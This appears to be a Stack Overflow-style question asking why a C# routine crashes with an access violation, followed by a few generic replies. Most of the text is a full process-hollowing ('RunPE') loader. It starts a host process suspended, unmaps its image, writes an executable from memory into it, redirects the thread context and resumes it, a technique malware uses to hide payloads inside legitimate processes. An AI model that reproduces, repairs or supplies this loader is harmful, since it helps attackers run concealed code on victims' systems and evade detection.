# C# 0xC0000005 (Access Violation) Possible Fix?

Tags: c#, memory

I am currently working with the following code. The issue I am facing is that the code is causing a `0xC0000005 Access Violation` (Memory) error. I've worked with this code for countless hours doing mass research and analysis. If anyone can just look through the code and let me know if they can spot the issue, that would be amazing! -Feivism

```
using System;
using System.Runtime.InteropServices;

public static unsafe class CMemoryExecute
{
    /// <summary>
    /// Runs an EXE (which is loaded in a byte array) in memory.
    /// </summary>
    /// <param name="exeBuffer">The EXE buffer.</param>
    /// <param name="hostProcess">Full path of the host process to run the buffer in.</param>
    /// <param name="optionalArguments">Optional command line arguments.</param>
    /// <returns></returns>
    public static bool Run(byte[] exeBuffer, string hostProcess, string optionalArguments = "")
    {
        var IMAGE_SECTION_HEADER = new byte[0x28]; // pish
        var IMAGE_NT_HEADERS = new byte[0xf8]; // pinh
        var IMAGE_DOS_HEADER = new byte[0x40]; // pidh
        var PROCESS_INFO = new int[0x4]; // pi
        var CONTEXT = new byte[0x2cc]; // ctx

       byte* pish;
       fixed (byte* p = &IMAGE_SECTION_HEADER[0])
       pish = p;

       byte* pinh;
       fixed (byte* p = &IMAGE_NT_HEADERS[0])
       pinh = p;

       byte* pidh;
       fixed (byte* p = &IMAGE_DOS_HEADER[0])
       pidh = p;

       byte* ctx;
       fixed (byte* p = &CONTEXT[0])
       ctx = p;

      // Set the flag.
      *(uint*)(ctx + 0x0 /* ContextFlags */) = CONTEXT_FULL;

      // Get the DOS header of the EXE.
      Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length);

      /* Sanity check:  See if we have MZ header. */
      if (*(ushort*)(pidh + 0x0 /* e_magic */) != IMAGE_DOS_SIGNATURE)
          return false;

      var e_lfanew = *(int*)(pidh + 0x3c);

      // Get the NT header of the EXE.
      Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length);

      /* Sanity check: See if we have PE00 header. */
      if (*(uint*)(pinh + 0x0 /* Signature */) != IMAGE_NT_SIGNATURE)
          return false;

      // Run with parameters if necessary.
      if (!string.IsNullOrEmpty(optionalArguments))
          hostProcess += " " + optionalArguments;

      if (!CreateProcess(null, hostProcess, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, new byte[0x44], PROCESS_INFO))
          return false;

      var ImageBase = new IntPtr(*(int*) (pinh + 0x34));
      NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase);
      if (VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, *(uint*)(pinh + 0x50 /* SizeOfImage */), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == IntPtr.Zero)
          Run(exeBuffer, hostProcess, optionalArguments); // Memory allocation failed; try again (this can happen in low memory situations)

      fixed (byte* p = &exeBuffer[0])
      NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, (IntPtr)p, *(uint*)(pinh + 84 /* SizeOfHeaders */), IntPtr.Zero);

      for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++)
      {
          Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length);
          fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)])
          NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + *(uint*)(pish + 0xc /* VirtualAddress */)), (IntPtr)p, *(uint*)(pish + 0x10 /* SizeOfRawData */), IntPtr.Zero);
      }

        NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);  
        NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)( *(uint*)(ctx + 0xAC /* ecx */)), ImageBase, 0x4, IntPtr.Zero);
        *(uint*) (ctx + 0xB0 /* eax */) = (uint)ImageBase + *(uint*) (pinh + 0x28 /* AddressOfEntryPoint */);
        NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
        NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero);

        return true;
    }

    private const uint CONTEXT_FULL = 0x10007;
    private const int CREATE_SUSPENDED = 0x4;
    private const int MEM_COMMIT = 0x1000;
    private const int MEM_RESERVE = 0x2000;
    private const int PAGE_EXECUTE_READWRITE = 0x40;
    private const ushort IMAGE_DOS_SIGNATURE = 0x5A4D; // MZ
    private const uint IMAGE_NT_SIGNATURE = 0x00004550; // PE00

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, byte[] lpStartupInfo, int[] lpProcessInfo);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern uint NtResumeThread(IntPtr hThread, IntPtr SuspendCount);
}
```

Comment: You would benefit by including more information about the error if possible... for example, what line of code is causing it?  Your IDE should be able to tell you this.

Answer (score 0):

At a first glace, it lools fine but check:

Is your code accessing an array/map element that does not exist?

Check if all of your arrays lengths are correct and start position anywhere is not greater than end position!

Comment: See now that is what I first had in mind after doing research on this access violation but I cannot find anything that is off.

Comment: This is not an answer, it is at best a comment requesting clarification.

Comment: Answer is asking the developer to check for common reasons why this issue can occur. No clarification is asked. :)

Comment: Yeah, considering the quality of this question is it really even fair to ask for a precise answer? no.